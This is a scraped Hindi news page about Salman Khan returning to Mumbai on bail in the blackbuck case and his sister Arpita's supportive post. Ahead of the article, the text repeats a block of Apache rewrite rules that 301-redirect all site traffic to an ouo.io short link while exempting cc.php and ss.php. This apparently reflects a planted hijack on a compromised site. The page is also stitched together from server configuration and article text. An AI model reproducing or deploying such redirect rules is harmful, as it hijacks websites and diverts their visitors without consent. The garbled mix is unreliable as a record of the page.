
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 931
Previousमुंबई। सलमान ख़ान काला हिरण शिकार मामले से बेल लेकर वापस मुंबई लौट आए हैं और यह उनके परिवार और फैन्स के लिए किसी खुशखबरी से कम नहीं है। सलमान की घर वापसी से हर कोई बेहद खुश नज़र आ रहा है। आम जनता से लेकर बॉलीवुड सेलेब्स भी सलमान को अपना सपोर्ट करने में लगे हैं। ज़ाहिर सी बात है कि सलमान की फैमिली भी उन्हें सपोर्ट करने में कोई कमी नहीं छोड़ रही है। हाल ही में सलमान की बहन अर्पिता ख़ान शर्मा ने अपने सोशल अकाउंट पर सलमान की एक तस्वीर शेयर की है जिसके साथ उन्होंने बेहद इमोशनल लाइन्स भी लिखी हैं। अर्पिता ने लिखा है कि सलमान उनकी ताकत, कमज़ोरी, अभिमान, ख़ुशी, ज़िन्दगी और पूरी दुनिया है। सलमान को सपोर्ट करते हुए उन्होंने यह भी लिखा कि जो लोग सलमान और उनकी सक्सेस को हैंडल नहीं कर सकते, भगवान उनका भला करे। यहां पढ़िए अर्पिता की पूरी पोस्ट-
सलमान ने भी अब अपने फैन्स और सपोर्टर्स को धन्यवाद देते हुए ट्वीट किया है और लिखा है कि वो उनके बहुत आभारी हैं जिन्होंने उन पर विश्वास किया और उनके साथ बने रहे! अर्पिता पूरे ख़ान परिवार की लाडली है और अपने भाइयों के बेहद करीब है, ख़ास कर सलमान के। जब भी सलमान किसी मुसीबत में होते हैं अर्पिता वहां उनका साथ देने हमेशा खड़ी होती हैं। आधी रात को भी अर्पिता सलमान के सपोर्ट के लिए तैयार रहती हैं। आपको याद होगा कि पिछली बार भी जब सलमान हिट एंड रन केस की सुनवाई के लिए अदालत गए थे तो अर्पिता उनके साथ गई थीं। इस बार भी अर्पिता अपनी बहन अलविरा के साथ जोधपुर गई थीं।